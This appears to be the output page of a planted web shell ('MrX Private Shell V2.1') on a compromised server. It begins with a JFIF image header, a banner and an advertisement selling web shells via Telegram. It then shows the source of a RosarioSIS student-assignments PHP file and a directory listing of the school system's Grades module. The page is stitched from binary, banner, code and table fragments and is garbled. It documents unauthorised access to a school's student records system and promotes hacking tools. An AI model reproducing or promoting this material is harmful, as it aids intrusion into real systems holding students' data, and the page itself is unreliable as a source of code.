����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Student Assignments
*
* Consult & submit assignments
*
* @since 2.9
*
* @package RosarioSIS
* @subpackage modules/Grades
*/
// Include Student Assignments functions.
require_once 'modules/Grades/includes/StudentAssignments.fnc.php';
if ( ! empty( $_REQUEST['assignment_id'] )
&& ! empty( $_REQUEST['marking_period_id'] ) )
{
// Outside link: Assignment is in the current MP?
if ( $_REQUEST['marking_period_id'] != UserMP() )
{
// Reset current MarkingPeriod.
$_SESSION['UserMP'] = $_REQUEST['marking_period_id'];
}
RedirectURL( 'marking_period_id' );
}
DrawHeader( ProgramTitle() . ' - ' . GetMP( UserMP() ) );
if ( ! empty( $_REQUEST['assignment_id'] )
&& ! GetAssignment( $_REQUEST['assignment_id'] ) )
{
// @since 10.7 Check Assignment is in current MP.
RedirectURL( 'assignment_id' );
}
if ( ! empty( $_REQUEST['assignment_id'] ) )
{
if ( $_REQUEST['modfunc'] === 'submit' )
{
$submitted = StudentAssignmentSubmit( $_REQUEST['assignment_id'], $error );
if ( $submitted )
{
$note[] = button( 'check', '', '', 'bigger' ) . ' ' . _( 'Assignment submitted.' );
echo ErrorMessage( $note, 'note' );
}
RedirectURL( [ 'modfunc', 'message' ] );
echo ErrorMessage( $error );
}
$assignments_link = PreparePHP_SELF( $_REQUEST, [ 'search_modfunc', 'assignment_id' ] );
DrawHeader( '<a href="' . URLEscape( $assignments_link ) . '">« ' . _( 'Back' ) . '</a>' );
$_ROSARIO['allow_edit'] = true;
$form_action = PreparePHP_SELF( $_REQUEST, [], [ 'modfunc' => 'submit' ] );
echo '<form method="POST" action="' . $form_action . '">';
StudentAssignmentSubmissionOutput( $_REQUEST['assignment_id'] );
echo '</form>';
}
else
{
// Output Current Quarter's Assignments List.
StudentAssignmentsListOutput();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AnomalousGrades.php | File | 7 KB | 0644 |
|
| Assignments-new.php | File | 16.22 KB | 0644 |
|
| Assignments.php | File | 33 KB | 0644 |
|
| Configuration.php | File | 14.5 KB | 0644 |
|
| EditHistoryMarkingPeriods.php | File | 5.47 KB | 0644 |
|
| EditReportCardGrades.php | File | 16.56 KB | 0644 |
|
| FinalGrades.php | File | 18.44 KB | 0644 |
|
| GPARankList.php | File | 2.71 KB | 0644 |
|
| GradeBreakdown.php | File | 5.16 KB | 0644 |
|
| GradebookBreakdown.php | File | 13.13 KB | 0644 |
|
| Grades.php | File | 42.87 KB | 0644 |
|
| HonorRoll.php | File | 3.63 KB | 0644 |
|
| InputFinalGrades.php | File | 48.09 KB | 0644 |
|
| MassCreateAssignments.php | File | 18.08 KB | 0644 |
|
| Menu.php | File | 3.19 KB | 0644 |
|
| ProgressReports.php | File | 18.06 KB | 0644 |
|
| ReportCardCommentCodes.php | File | 8.18 KB | 0644 |
|
| ReportCardComments.php | File | 14.78 KB | 0644 |
|
| ReportCardGrades.php | File | 12 KB | 0644 |
|
| ReportCards.php | File | 2.98 KB | 0644 |
|
| StudentAssignments.php | File | 1.74 KB | 0644 |
|
| StudentGrades.php | File | 26.83 KB | 0644 |
|
| TeacherCompletion.php | File | 5.86 KB | 0644 |
|
| Transcripts.php | File | 3.22 KB | 0644 |
|